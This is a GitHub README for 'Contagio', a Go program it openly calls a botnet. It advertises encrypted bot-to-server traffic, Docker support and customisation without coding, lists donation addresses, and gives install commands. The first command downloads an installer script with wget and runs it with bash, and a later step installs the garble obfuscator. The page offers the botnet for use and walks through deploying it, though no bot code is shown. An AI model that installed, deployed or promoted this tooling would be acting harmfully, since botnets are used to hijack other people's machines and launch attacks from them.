Skip to content

TryZeroOne/Contagio

Repository files navigation

Contagio

Contagio is a botnet written in go. This is a beta version so there may be bugs.

Installation
Supported systems
Customisation Donations

Features

  • Bot written in pure go without any dependencies (native)
  • All data between bot and server is encrypted
  • You can run in docker container
  • Customisation without programming knowledge

Donations

Ton EQAmUr0NqEz6nnfUc2GeeGbUhOmd7Wh1zvIVQWWdj_MN6wlY
Litecoin LMtj3jCFjgvDSCP1jqoE5AdbSbSevVxRJg
Monero 429o1bxqyhs83hozpwbEZJitPcX8W73Nz86YRvyiWFkHAfnMk2ZA1VjeNnduKLKcFw45U2VAsQTFs7S5Ac1E16roKhnP777

Supported systems

Os Status
Linux
Windows
macOS

Linux distributions

Distro Status
Arch
Manjaro
Fedora
Centos
Ubuntu

system information can be found in the photos in the assets folder

Installation

Contagio has its own installer.

 wget https://raw.githubusercontent.com/TryZeroOne/Contagio/main/installer/installer.sh -O installer.sh
 bash installer.sh -[args]

 Example: bash installer.sh -default

Args:

clean installs contagio without preinstalled configurations and themes.
default installs contagio with preinstalled configurations and themes.
source ~/.bashrc 
go install mvdan.cc/garble@latest
nimble install parsetoml -y
cd Contagio 
go mod init contagio
go mod tidy

then follow the steps from setup.txt
Setup guide soon...

Customisation

Create your theme in the themes folder ( test.toml, for example), then add ImportTheme = "./themes/test.toml" at the beginning config.toml

Docs soon...